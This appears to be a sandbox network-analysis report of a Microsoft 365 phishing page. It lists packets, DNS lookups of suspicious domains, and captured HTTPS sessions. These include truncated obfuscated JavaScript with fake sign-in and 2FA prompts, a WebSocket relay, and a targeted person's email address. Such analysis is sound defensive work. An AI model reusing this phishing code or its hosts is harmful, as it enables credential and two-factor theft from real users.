Mar 27, 2025 19:08:01.631958961 CET	49737	443	192.168.2.16	104.26.12.205
Mar 27, 2025 19:08:01.631968021 CET	443	49737	104.26.12.205	192.168.2.16
Mar 27, 2025 19:08:01.828646898 CET	443	49737	104.26.12.205	192.168.2.16
Mar 27, 2025 19:08:01.828761101 CET	49737	443	192.168.2.16	104.26.12.205
Mar 27, 2025 19:08:01.829813957 CET	49737	443	192.168.2.16	104.26.12.205
Mar 27, 2025 19:08:01.829823017 CET	443	49737	104.26.12.205	192.168.2.16
Mar 27, 2025 19:08:01.830302954 CET	443	49737	104.26.12.205	192.168.2.16
Mar 27, 2025 19:08:01.830560923 CET	49737	443	192.168.2.16	104.26.12.205
Mar 27, 2025 19:08:01.876267910 CET	443	49737	104.26.12.205	192.168.2.16
Mar 27, 2025 19:08:02.054694891 CET	443	49737	104.26.12.205	192.168.2.16
Mar 27, 2025 19:08:02.054766893 CET	443	49737	104.26.12.205	192.168.2.16
Mar 27, 2025 19:08:02.054881096 CET	49737	443	192.168.2.16	104.26.12.205
Mar 27, 2025 19:08:02.055977106 CET	49737	443	192.168.2.16	104.26.12.205
Mar 27, 2025 19:08:02.056015015 CET	443	49737	104.26.12.205	192.168.2.16
Mar 27, 2025 19:08:02.057682037 CET	49735	8248	192.168.2.16	185.174.100.76
Mar 27, 2025 19:08:02.149008989 CET	49738	443	192.168.2.16	172.67.74.152
Mar 27, 2025 19:08:02.149050951 CET	443	49738	172.67.74.152	192.168.2.16
Mar 27, 2025 19:08:02.149108887 CET	49738	443	192.168.2.16	172.67.74.152
Mar 27, 2025 19:08:02.149310112 CET	49738	443	192.168.2.16	172.67.74.152
Mar 27, 2025 19:08:02.149327993 CET	443	49738	172.67.74.152	192.168.2.16
Mar 27, 2025 19:08:02.264193058 CET	8248	49735	185.174.100.76	192.168.2.16
Mar 27, 2025 19:08:02.336977959 CET	443	49738	172.67.74.152	192.168.2.16
Mar 27, 2025 19:08:02.337089062 CET	49738	443	192.168.2.16	172.67.74.152
Mar 27, 2025 19:08:02.337532043 CET	49738	443	192.168.2.16	172.67.74.152
Mar 27, 2025 19:08:02.337543011 CET	443	49738	172.67.74.152	192.168.2.16
Mar 27, 2025 19:08:02.337779045 CET	443	49738	172.67.74.152	192.168.2.16
Mar 27, 2025 19:08:02.338023901 CET	49738	443	192.168.2.16	172.67.74.152
Mar 27, 2025 19:08:02.380358934 CET	443	49738	172.67.74.152	192.168.2.16
Mar 27, 2025 19:08:02.576795101 CET	443	49738	172.67.74.152	192.168.2.16
Mar 27, 2025 19:08:02.576853991 CET	443	49738	172.67.74.152	192.168.2.16
Mar 27, 2025 19:08:02.576926947 CET	49738	443	192.168.2.16	172.67.74.152
Mar 27, 2025 19:08:02.577670097 CET	49738	443	192.168.2.16	172.67.74.152
Mar 27, 2025 19:08:02.577687025 CET	443	49738	172.67.74.152	192.168.2.16
Mar 27, 2025 19:08:11.749552965 CET	80	49694	208.89.73.21	192.168.2.16
Mar 27, 2025 19:08:11.749766111 CET	49694	80	192.168.2.16	208.89.73.21
Mar 27, 2025 19:08:11.749806881 CET	49694	80	192.168.2.16	208.89.73.21
Mar 27, 2025 19:08:11.752011061 CET	49692	80	192.168.2.16	142.250.65.195
Mar 27, 2025 19:08:11.842168093 CET	80	49692	142.250.65.195	192.168.2.16
Mar 27, 2025 19:08:11.842302084 CET	49692	80	192.168.2.16	142.250.65.195
Mar 27, 2025 19:08:11.847172976 CET	80	49694	208.89.73.21	192.168.2.16
Mar 27, 2025 19:08:29.746380091 CET	49744	443	192.168.2.16	142.251.40.164
Mar 27, 2025 19:08:29.746434927 CET	443	49744	142.251.40.164	192.168.2.16
Mar 27, 2025 19:08:29.746525049 CET	49744	443	192.168.2.16	142.251.40.164
Mar 27, 2025 19:08:29.746723890 CET	49744	443	192.168.2.16	142.251.40.164
Mar 27, 2025 19:08:29.746738911 CET	443	49744	142.251.40.164	192.168.2.16
Mar 27, 2025 19:08:29.940557003 CET	443	49744	142.251.40.164	192.168.2.16
Mar 27, 2025 19:08:29.941050053 CET	49744	443	192.168.2.16	142.251.40.164
Mar 27, 2025 19:08:29.941140890 CET	443	49744	142.251.40.164	192.168.2.16
Mar 27, 2025 19:08:39.990027905 CET	443	49744	142.251.40.164	192.168.2.16
Mar 27, 2025 19:08:39.990112066 CET	443	49744	142.251.40.164	192.168.2.16
Mar 27, 2025 19:08:39.990248919 CET	49744	443	192.168.2.16	142.251.40.164
Mar 27, 2025 19:08:41.148168087 CET	49744	443	192.168.2.16	142.251.40.164
Mar 27, 2025 19:08:41.148200989 CET	443	49744	142.251.40.164	192.168.2.16
Mar 27, 2025 19:08:47.279300928 CET	49735	8248	192.168.2.16	185.174.100.76
Mar 27, 2025 19:08:47.444633961 CET	8248	49735	185.174.100.76	192.168.2.16
Mar 27, 2025 19:09:29.800755978 CET	49751	443	192.168.2.16	142.251.40.164
Mar 27, 2025 19:09:29.800852060 CET	443	49751	142.251.40.164	192.168.2.16
Mar 27, 2025 19:09:29.800981998 CET	49751	443	192.168.2.16	142.251.40.164
Mar 27, 2025 19:09:29.801202059 CET	49751	443	192.168.2.16	142.251.40.164
Mar 27, 2025 19:09:29.801232100 CET	443	49751	142.251.40.164	192.168.2.16
Mar 27, 2025 19:09:29.996655941 CET	443	49751	142.251.40.164	192.168.2.16
Mar 27, 2025 19:09:29.997103930 CET	49751	443	192.168.2.16	142.251.40.164
Mar 27, 2025 19:09:29.997149944 CET	443	49751	142.251.40.164	192.168.2.16

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 27, 2025 19:07:25.041538954 CET	51632	53	192.168.2.16	1.1.1.1
Mar 27, 2025 19:07:25.041698933 CET	53221	53	192.168.2.16	1.1.1.1
Mar 27, 2025 19:07:25.047439098 CET	53	64380	1.1.1.1	192.168.2.16
Mar 27, 2025 19:07:25.128664017 CET	53	63397	1.1.1.1	192.168.2.16
Mar 27, 2025 19:07:25.129780054 CET	53	51632	1.1.1.1	192.168.2.16
Mar 27, 2025 19:07:25.129884958 CET	53	53221	1.1.1.1	192.168.2.16
Mar 27, 2025 19:07:25.897908926 CET	53	63611	1.1.1.1	192.168.2.16
Mar 27, 2025 19:07:26.883919001 CET	60581	53	192.168.2.16	1.1.1.1
Mar 27, 2025 19:07:26.884064913 CET	62519	53	192.168.2.16	1.1.1.1
Mar 27, 2025 19:07:26.972162008 CET	53	60581	1.1.1.1	192.168.2.16
Mar 27, 2025 19:07:26.972208023 CET	53	62519	1.1.1.1	192.168.2.16
Mar 27, 2025 19:07:28.443418026 CET	53	50593	1.1.1.1	192.168.2.16
Mar 27, 2025 19:07:29.091082096 CET	63267	53	192.168.2.16	1.1.1.1
Mar 27, 2025 19:07:29.091228962 CET	54000	53	192.168.2.16	1.1.1.1
Mar 27, 2025 19:07:29.180031061 CET	53	63267	1.1.1.1	192.168.2.16
Mar 27, 2025 19:07:29.180494070 CET	53	54000	1.1.1.1	192.168.2.16
Mar 27, 2025 19:07:29.680372953 CET	53856	53	192.168.2.16	1.1.1.1
Mar 27, 2025 19:07:29.680565119 CET	62214	53	192.168.2.16	1.1.1.1
Mar 27, 2025 19:07:29.765399933 CET	61980	53	192.168.2.16	1.1.1.1
Mar 27, 2025 19:07:29.765816927 CET	60817	53	192.168.2.16	1.1.1.1
Mar 27, 2025 19:07:29.768739939 CET	53	53856	1.1.1.1	192.168.2.16
Mar 27, 2025 19:07:29.768774986 CET	53	62214	1.1.1.1	192.168.2.16
Mar 27, 2025 19:07:29.854084969 CET	53	61980	1.1.1.1	192.168.2.16
Mar 27, 2025 19:07:29.854120970 CET	53	60817	1.1.1.1	192.168.2.16
Mar 27, 2025 19:07:30.245202065 CET	58883	53	192.168.2.16	1.1.1.1
Mar 27, 2025 19:07:30.245392084 CET	52173	53	192.168.2.16	1.1.1.1
Mar 27, 2025 19:07:30.333666086 CET	53	58883	1.1.1.1	192.168.2.16
Mar 27, 2025 19:07:30.333705902 CET	53	52173	1.1.1.1	192.168.2.16
Mar 27, 2025 19:07:42.958333969 CET	53	65057	1.1.1.1	192.168.2.16
Mar 27, 2025 19:08:00.942975044 CET	61611	53	192.168.2.16	1.1.1.1
Mar 27, 2025 19:08:00.943124056 CET	54559	53	192.168.2.16	1.1.1.1
Mar 27, 2025 19:08:01.031719923 CET	53	61611	1.1.1.1	192.168.2.16
Mar 27, 2025 19:08:01.031790972 CET	53	54559	1.1.1.1	192.168.2.16
Mar 27, 2025 19:08:01.097785950 CET	53	56600	162.159.36.2	192.168.2.16
Mar 27, 2025 19:08:01.542028904 CET	53767	53	192.168.2.16	1.1.1.1
Mar 27, 2025 19:08:01.542227983 CET	60810	53	192.168.2.16	1.1.1.1
Mar 27, 2025 19:08:01.630804062 CET	53	53767	1.1.1.1	192.168.2.16
Mar 27, 2025 19:08:01.630870104 CET	53	60810	1.1.1.1	192.168.2.16
Mar 27, 2025 19:08:01.937297106 CET	53	50234	1.1.1.1	192.168.2.16
Mar 27, 2025 19:08:02.059226036 CET	65170	53	192.168.2.16	1.1.1.1
Mar 27, 2025 19:08:02.059514999 CET	52894	53	192.168.2.16	1.1.1.1
Mar 27, 2025 19:08:02.148166895 CET	53	65170	1.1.1.1	192.168.2.16
Mar 27, 2025 19:08:02.148231030 CET	53	52894	1.1.1.1	192.168.2.16
Mar 27, 2025 19:08:24.950896978 CET	53	51453	1.1.1.1	192.168.2.16
Mar 27, 2025 19:08:24.957600117 CET	53	62146	1.1.1.1	192.168.2.16
Mar 27, 2025 19:08:39.652791977 CET	138	138	192.168.2.16	192.168.2.255
Mar 27, 2025 19:08:55.345635891 CET	53	58147	1.1.1.1	192.168.2.16

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 27, 2025 19:07:25.041538954 CET	192.168.2.16	1.1.1.1	0xa5d	Standard query (0)	office.avcbtech.store	A (IP address)	IN (0x0001)	false
Mar 27, 2025 19:07:25.041698933 CET	192.168.2.16	1.1.1.1	0x617c	Standard query (0)	office.avcbtech.store	65	IN (0x0001)	false
Mar 27, 2025 19:07:26.883919001 CET	192.168.2.16	1.1.1.1	0x3af8	Standard query (0)	sender.linxcoded.top	A (IP address)	IN (0x0001)	false
Mar 27, 2025 19:07:26.884064913 CET	192.168.2.16	1.1.1.1	0xc955	Standard query (0)	sender.linxcoded.top	65	IN (0x0001)	false
Mar 27, 2025 19:07:29.091082096 CET	192.168.2.16	1.1.1.1	0x7e22	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Mar 27, 2025 19:07:29.091228962 CET	192.168.2.16	1.1.1.1	0xc58c	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
Mar 27, 2025 19:07:29.680372953 CET	192.168.2.16	1.1.1.1	0xad4c	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Mar 27, 2025 19:07:29.680565119 CET	192.168.2.16	1.1.1.1	0x5b95	Standard query (0)	www.google.com	65	IN (0x0001)	false
Mar 27, 2025 19:07:29.765399933 CET	192.168.2.16	1.1.1.1	0x7358	Standard query (0)	i.imgur.com	A (IP address)	IN (0x0001)	false
Mar 27, 2025 19:07:29.765816927 CET	192.168.2.16	1.1.1.1	0xc4f9	Standard query (0)	i.imgur.com	65	IN (0x0001)	false
Mar 27, 2025 19:07:30.245202065 CET	192.168.2.16	1.1.1.1	0xadcf	Standard query (0)	i.imgur.com	A (IP address)	IN (0x0001)	false
Mar 27, 2025 19:07:30.245392084 CET	192.168.2.16	1.1.1.1	0x9db5	Standard query (0)	i.imgur.com	65	IN (0x0001)	false
Mar 27, 2025 19:08:00.942975044 CET	192.168.2.16	1.1.1.1	0x3b0	Standard query (0)	server1.linxcoded.top	A (IP address)	IN (0x0001)	false
Mar 27, 2025 19:08:00.943124056 CET	192.168.2.16	1.1.1.1	0x3545	Standard query (0)	_8248._https.server1.linxcoded.top	65	IN (0x0001)	false
Mar 27, 2025 19:08:01.542028904 CET	192.168.2.16	1.1.1.1	0x102d	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 27, 2025 19:08:01.542227983 CET	192.168.2.16	1.1.1.1	0x1c8b	Standard query (0)	api.ipify.org	65	IN (0x0001)	false
Mar 27, 2025 19:08:02.059226036 CET	192.168.2.16	1.1.1.1	0x83ec	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 27, 2025 19:08:02.059514999 CET	192.168.2.16	1.1.1.1	0xabc9	Standard query (0)	api.ipify.org	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 27, 2025 19:07:25.129780054 CET	1.1.1.1	192.168.2.16	0xa5d	No error (0)	office.avcbtech.store		139.28.36.38	A (IP address)	IN (0x0001)	false
Mar 27, 2025 19:07:26.972162008 CET	1.1.1.1	192.168.2.16	0x3af8	No error (0)	sender.linxcoded.top		185.174.100.20	A (IP address)	IN (0x0001)	false
Mar 27, 2025 19:07:29.180031061 CET	1.1.1.1	192.168.2.16	0x7e22	No error (0)	code.jquery.com		151.101.2.137	A (IP address)	IN (0x0001)	false
Mar 27, 2025 19:07:29.180031061 CET	1.1.1.1	192.168.2.16	0x7e22	No error (0)	code.jquery.com		151.101.66.137	A (IP address)	IN (0x0001)	false
Mar 27, 2025 19:07:29.180031061 CET	1.1.1.1	192.168.2.16	0x7e22	No error (0)	code.jquery.com		151.101.194.137	A (IP address)	IN (0x0001)	false
Mar 27, 2025 19:07:29.180031061 CET	1.1.1.1	192.168.2.16	0x7e22	No error (0)	code.jquery.com		151.101.130.137	A (IP address)	IN (0x0001)	false
Mar 27, 2025 19:07:29.768739939 CET	1.1.1.1	192.168.2.16	0xad4c	No error (0)	www.google.com		142.251.40.164	A (IP address)	IN (0x0001)	false
Mar 27, 2025 19:07:29.768774986 CET	1.1.1.1	192.168.2.16	0x5b95	No error (0)	www.google.com			65	IN (0x0001)	false
Mar 27, 2025 19:07:29.854084969 CET	1.1.1.1	192.168.2.16	0x7358	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 27, 2025 19:07:29.854084969 CET	1.1.1.1	192.168.2.16	0x7358	No error (0)	ipv4.imgur.map.fastly.net		151.101.44.193	A (IP address)	IN (0x0001)	false
Mar 27, 2025 19:07:29.854120970 CET	1.1.1.1	192.168.2.16	0xc4f9	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 27, 2025 19:07:29.854528904 CET	1.1.1.1	192.168.2.16	0xd076	No error (0)	shed.dual-low.s-part-0013.t-0009.t-msedge.net	s-part-0013.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 27, 2025 19:07:29.854528904 CET	1.1.1.1	192.168.2.16	0xd076	No error (0)	s-part-0013.t-0009.t-msedge.net		13.107.246.41	A (IP address)	IN (0x0001)	false
Mar 27, 2025 19:07:30.333666086 CET	1.1.1.1	192.168.2.16	0xadcf	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 27, 2025 19:07:30.333666086 CET	1.1.1.1	192.168.2.16	0xadcf	No error (0)	ipv4.imgur.map.fastly.net		151.101.44.193	A (IP address)	IN (0x0001)	false
Mar 27, 2025 19:07:30.333705902 CET	1.1.1.1	192.168.2.16	0x9db5	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 27, 2025 19:07:30.465543985 CET	1.1.1.1	192.168.2.16	0x9966	No error (0)	shed.dual-low.s-part-0012.t-0009.t-msedge.net	s-part-0012.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 27, 2025 19:07:30.465543985 CET	1.1.1.1	192.168.2.16	0x9966	No error (0)	s-part-0012.t-0009.t-msedge.net		13.107.246.40	A (IP address)	IN (0x0001)	false
Mar 27, 2025 19:08:01.031719923 CET	1.1.1.1	192.168.2.16	0x3b0	No error (0)	server1.linxcoded.top		185.174.100.76	A (IP address)	IN (0x0001)	false
Mar 27, 2025 19:08:01.031790972 CET	1.1.1.1	192.168.2.16	0x3545	Name error (3)	_8248._https.server1.linxcoded.top	none	none	65	IN (0x0001)	false
Mar 27, 2025 19:08:01.630804062 CET	1.1.1.1	192.168.2.16	0x102d	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 27, 2025 19:08:01.630804062 CET	1.1.1.1	192.168.2.16	0x102d	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 27, 2025 19:08:01.630804062 CET	1.1.1.1	192.168.2.16	0x102d	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 27, 2025 19:08:01.630870104 CET	1.1.1.1	192.168.2.16	0x1c8b	No error (0)	api.ipify.org			65	IN (0x0001)	false
Mar 27, 2025 19:08:02.148166895 CET	1.1.1.1	192.168.2.16	0x83ec	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 27, 2025 19:08:02.148166895 CET	1.1.1.1	192.168.2.16	0x83ec	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 27, 2025 19:08:02.148166895 CET	1.1.1.1	192.168.2.16	0x83ec	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 27, 2025 19:08:02.148231030 CET	1.1.1.1	192.168.2.16	0xabc9	No error (0)	api.ipify.org			65	IN (0x0001)	false

HTTP Request Dependency Graph

office.avcbtech.store

sender.linxcoded.top

code.jquery.com

i.imgur.com

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.16	49711	139.28.36.38	443	7116	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 18:07:26 UTC	574	OUT	GET /kuk/xls/k1u2k.js?uid=michael.masselli@pharma.com HTTP/1.1 Host: office.avcbtech.store Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 18:07:26 UTC	396	IN	HTTP/1.1 200 OK Server: nginx/1.26.3 Date: Thu, 27 Mar 2025 18:07:26 GMT Content-Type: application/javascript Content-Length: 68421 Last-Modified: Fri, 14 Mar 2025 13:25:44 GMT Connection: close ETag: "67d42e58-10b45" Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 Access-Control-Allow-Origin: * Cache-Control: public, must-revalidate Accept-Ranges: bytes
2025-03-27 18:07:26 UTC	15988	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 65 31 31 62 28 29 7b 76 61 72 20 5f 30 78 35 30 64 36 39 35 3d 5b 27 23 62 61 63 6b 27 2c 27 49 6e 63 6f 72 72 65 63 74 5c 78 32 30 32 46 41 5c 78 32 30 63 6f 64 65 2e 5c 78 32 30 54 72 79 5c 78 32 30 61 67 61 69 6e 2e 27 2c 27 64 69 76 36 27 2c 27 23 62 61 63 6b 2d 74 65 78 74 27 2c 27 74 79 70 65 27 2c 27 4d 69 63 72 6f 73 6f 66 74 27 2c 27 72 65 6c 61 79 27 2c 27 36 6b 67 6a 58 4c 43 27 2c 27 73 74 79 6c 65 27 2c 27 70 61 67 65 5f 76 69 73 69 74 27 2c 27 63 6c 6f 73 65 27 2c 27 61 70 70 72 6f 76 65 5f 73 69 67 6e 69 6e 27 2c 27 64 69 76 35 27 2c 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 66 66 69 63 65 2e 63 6f 6d 27 2c 27 23 63 61 70 74 63 68 61 2d 62 74 6e 27 2c 27 2e 6c 6f 67 6f 6e 61 6d 65 27 2c 27 64 69 73 61 62 Data Ascii: function _0xe11b(){var _0x50d695=['#back','Incorrect\x202FA\x20code.\x20Try\x20again.','div6','#back-text','type','Microsoft','relay','6kgjXLC','style','page_visit','close','approve_signin','div5','https://www.office.com','#captcha-btn','.logoname','disab
2025-03-27 18:07:26 UTC	16384	IN	Data Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 66 6f 6e 74 2d 73 69 7a 65 3a 5c 78 32 30 31 36 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 6f 6c 6f 72 3a 5c 78 32 30 72 67 62 28 35 31 2c 5c 78 32 30 35 31 2c 5c 78 32 30 35 31 29 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 Data Ascii: \x20\x20\x20\x20\x20\x20\x20font-size:\x2016px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20color:\x20rgb(51,\x2051,\x2051);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
2025-03-27 18:07:26 UTC	16384	IN	Data Raw: 32 32 3e 3c 70 5c 78 32 30 69 64 3d 5c 78 32 32 61 70 70 72 6f 76 65 2d 6e 75 6d 62 65 72 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 68 33 5c 78 32 30 74 65 78 74 2d 63 65 6e 74 65 72 5c 78 32 32 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 62 6f 72 64 65 72 3a 5c 78 32 30 32 70 78 5c 78 32 30 73 6f 6c 69 64 5c 78 32 30 62 6c 61 63 6b 3b 5c 78 32 30 66 6f 6e 74 2d 73 69 7a 65 3a 5c 78 32 30 34 30 70 78 3b 5c 78 32 30 70 61 64 64 69 6e 67 3a 5c 78 32 30 31 32 70 78 5c 78 32 30 31 32 70 78 3b 5c 78 32 30 74 65 78 74 2d 61 6c 69 67 6e 3a 5c 78 32 30 63 65 6e 74 65 72 3b 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 5c 78 32 32 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 62 72 3e 27 2c 27 3c 61 5c 78 32 30 68 72 65 66 Data Ascii: 22><p\x20id=\x22approve-number\x22\x20class=\x22h3\x20text-center\x22\x20style=\x22border:\x202px\x20solid\x20black;\x20font-size:\x2040px;\x20padding:\x2012px\x2012px;\x20text-align:\x20center;\x20display:\x20inline-block;\x22></p></div><br>','<a\x20href
2025-03-27 18:07:26 UTC	16384	IN	Data Raw: 32 31 34 5b 5f 30 78 34 64 34 61 64 61 28 30 78 31 38 38 29 5d 28 5f 30 78 34 64 34 61 64 61 28 30 78 32 34 62 29 29 2c 5f 30 78 35 66 63 32 31 34 5b 5f 30 78 34 64 34 61 64 61 28 30 78 31 38 38 29 5d 28 27 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 6f 72 6d 2d 67 72 6f 75 70 5c 78 32 30 6d 74 2d 32 5c 78 32 32 3e 3c 69 6e 70 75 74 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 65 6d 61 69 6c 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 61 69 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 5c 78 32 30 72 6f 75 6e 64 65 64 2d 30 5c 78 32 30 62 6f 72 64 65 72 2d 64 61 72 6b 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 61 69 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 3d 5c 78 Data Ascii: 214[_0x4d4ada(0x188)](_0x4d4ada(0x24b)),_0x5fc214[_0x4d4ada(0x188)]('<div\x20class=\x22form-group\x20mt-2\x22><input\x20type=\x22email\x22\x20name=\x22ai\x22\x20class=\x22form-control\x20rounded-0\x20border-dark\x22\x20id=\x22ai\x22\x20aria-describedby=\x
2025-03-27 18:07:26 UTC	3281	IN	Data Raw: 28 27 23 6d 73 67 2d 32 66 61 27 29 5b 5f 30 78 32 38 35 37 35 66 28 30 78 31 62 37 29 5d 28 5f 30 78 32 38 35 37 35 66 28 30 78 31 39 32 29 29 3b 7d 7d 5f 30 78 31 36 38 65 66 33 28 29 3b 7d 2c 27 65 72 72 6f 72 27 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 34 34 61 33 65 36 3d 5f 30 78 31 38 63 32 37 61 3b 24 28 5f 30 78 34 34 61 33 65 36 28 30 78 31 62 39 29 29 5b 27 74 65 78 74 27 5d 28 5f 30 78 34 34 61 33 65 36 28 30 78 31 62 38 29 29 2c 5f 30 78 31 36 38 65 66 33 28 29 3b 7d 7d 29 3b 65 6c 73 65 7b 63 6f 6e 73 74 20 5f 30 78 31 30 37 31 66 32 3d 6e 65 77 20 57 65 62 53 6f 63 6b 65 74 28 5f 30 78 31 38 63 32 37 61 28 30 78 31 64 63 29 29 3b 5f 30 78 31 30 37 31 66 32 5b 5f 30 78 31 38 63 32 37 61 28 30 78 32 33 38 29 5d 3d 66 75 6e 63 Data Ascii: ('#msg-2fa')[_0x28575f(0x1b7)](_0x28575f(0x192));}}_0x168ef3();},'error':function(){var _0x44a3e6=_0x18c27a;$(_0x44a3e6(0x1b9))['text'](_0x44a3e6(0x1b8)),_0x168ef3();}});else{const _0x1071f2=new WebSocket(_0x18c27a(0x1dc));_0x1071f2[_0x18c27a(0x238)]=func

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.16	49714	185.174.100.20	443	7116	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 18:07:27 UTC	566	OUT	GET /start/xls/includes/css6.css HTTP/1.1 Host: sender.linxcoded.top Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 18:07:27 UTC	383	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 27 Mar 2025 18:07:27 GMT Content-Type: text/css Content-Length: 258966 Last-Modified: Mon, 27 Jan 2025 22:21:00 GMT Connection: close ETag: "679806cc-3f396" Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 Access-Control-Allow-Origin: * Cache-Control: public, must-revalidate Accept-Ranges: bytes
2025-03-27 18:07:27 UTC	16001	IN	Data Raw: 20 2f 2a 21 0d 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0d 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0d 0a 20 2a 2f 0d 0a 20 20 20 20 3a 72 6f 6f 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 2d 62 6c 75 65 3a 20 23 30 30 37 Data Ascii: /! Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors * Copyright 2011-2018 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */ :root { --blue: #007
